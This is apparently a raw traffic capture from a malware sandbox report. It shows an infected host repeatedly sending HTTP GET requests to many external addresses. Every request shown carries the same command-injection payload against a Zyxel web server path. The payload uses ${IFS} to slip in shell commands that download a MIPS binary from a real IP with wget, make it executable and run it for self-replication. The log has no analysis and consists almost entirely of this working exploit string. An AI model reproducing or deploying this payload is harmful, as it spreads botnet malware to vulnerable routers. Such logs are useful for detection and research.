                                        Jan 14, 2024 16:18:09.003546953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        274192.168.2.1348448197.251.173.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:09.003588915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        275192.168.2.1349972177.246.120.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:09.003705978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        276192.168.2.1337584111.166.34.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:09.003741980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        277192.168.2.1349460161.249.210.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007169962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        278192.168.2.135230472.50.11.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007183075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        279192.168.2.13401825.39.172.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007221937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        280192.168.2.135986035.206.122.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007256985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        281192.168.2.133805832.123.121.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007298946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        282192.168.2.1333696187.245.11.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007328987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        283192.168.2.133621051.78.231.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007375956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        284192.168.2.1357508154.229.181.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007411003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        285192.168.2.1355120175.77.41.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007416010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        286192.168.2.1359912139.154.46.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007572889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        287192.168.2.1336958145.25.236.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:10.007591963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        288192.168.2.1341630159.180.8.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012711048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        289192.168.2.135708657.232.107.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012752056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        290192.168.2.1337054166.138.45.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012787104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        291192.168.2.135049068.22.233.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012842894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        292192.168.2.133319842.59.206.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012876034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        293192.168.2.1356090111.1.80.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012897968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        294192.168.2.1357790182.98.37.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012934923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        295192.168.2.1334798219.114.206.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012938023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        296192.168.2.135440091.216.248.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.012989998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        297192.168.2.133788035.188.170.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013039112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        298192.168.2.1355448143.162.214.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013050079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        299192.168.2.1349856128.28.80.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013077974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        300192.168.2.1345308121.90.210.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013123035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        301192.168.2.1347368131.227.48.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013166904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        302192.168.2.13404148.244.202.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013231039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        303192.168.2.135790498.19.107.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013248920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        304192.168.2.135061085.107.165.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013284922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        305192.168.2.1347164167.161.59.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013288975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        306192.168.2.1346298213.32.189.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013329983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        307192.168.2.133294884.207.92.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013355017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        308192.168.2.1335548206.3.130.40443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013358116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        309192.168.2.1342690213.35.141.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:11.013653994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        310192.168.2.134836440.164.109.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017544031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        311192.168.2.135026683.47.223.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017601013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        312192.168.2.1359376147.97.31.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017622948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        313192.168.2.1356858195.41.76.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017678022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        314192.168.2.1337336115.65.220.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017780066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        315192.168.2.135465671.61.99.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:12.017824888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        316192.168.2.134006453.51.87.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:13.023864031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        317192.168.2.1348108150.240.68.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:13.023938894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        318192.168.2.133899699.102.103.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:13.024009943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        319192.168.2.135294470.212.10.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028182983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        320192.168.2.135899495.130.116.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028235912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        321192.168.2.1345448103.150.114.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028254986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        322192.168.2.1350848101.207.126.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028285027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        323192.168.2.1342552107.240.170.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028333902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        324192.168.2.1358546221.64.139.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028394938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        325192.168.2.1343044157.31.151.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028434992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        326192.168.2.1334424174.202.4.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028460979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        327192.168.2.1352402166.243.88.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028505087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        328192.168.2.135165427.217.28.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028562069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        329192.168.2.1344276122.106.104.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028573036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        330192.168.2.135010865.114.252.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028618097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        331192.168.2.1354786130.233.223.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028656960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        332192.168.2.1359356132.80.230.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028687954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        333192.168.2.1351148134.169.117.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028737068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        334192.168.2.133322635.236.82.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028762102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        335192.168.2.1349740205.107.147.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:14.028795958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        336192.168.2.13341302.76.120.70443
                                        TimestampBytes transferredDirectionData
